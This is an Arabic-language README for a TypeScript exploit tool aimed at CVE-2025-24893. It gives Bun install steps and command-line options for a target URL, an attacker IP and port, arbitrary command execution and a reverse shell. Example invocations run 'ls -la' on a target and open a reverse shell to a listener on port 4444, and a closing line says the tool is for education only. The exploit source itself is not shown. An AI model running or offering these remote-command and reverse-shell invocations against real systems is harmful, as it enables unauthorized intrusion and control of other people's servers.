
استغلال TypeScript لـ CVE-2025-24893 يتيح تنفيذ الأوامر عن بُعد وقشرة عكسية على عناوين URL المستهدفة عبر خيارات قابلة للتكوين.
تثبيت Bun:
curl -fsSL https://bun.com/install | bash
لتثبيت التبعيات:
bun install
للتشغيل:
bun run CVE-2025-24893.ts
تم إنشاء هذا المشروع باستخدام bun init في bun v1.2.19. Bun هو بيئة تشغيل جافا سكريبت سريعة وشاملة.
الاستخدام: bun CVE-2025-24893.ts [خيارات]
الخيارات:
-u, --url <url> عنوان URL المستهدف للتفاعل معه.
-i, --ip <ip-address> عنوان IP لاتصال shell العكسي.
-p, --port <port-number> رقم المنفذ لـ shell العكسي.
-r, --rverse فتح اتصال shell عكسي.
-c, --cmd <command> تنفيذ أمر محدد.
أمثلة:
# تنفيذ أمر على عنوان URL مستهدف
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# فتح shell عكسي
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
هذا الاستغلال والدليل مخصصان للأغراض التعليمية فقط. استخدم هذه المعلومات بمسؤولية وفقط على الأنظمة التي لديك إذن صريح باختبارها. الاستغلال غير المصرح به للأنظمة غير قانوني وغير أخلاقي. المؤلفون والمساهمون ليسوا مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه المعلومات.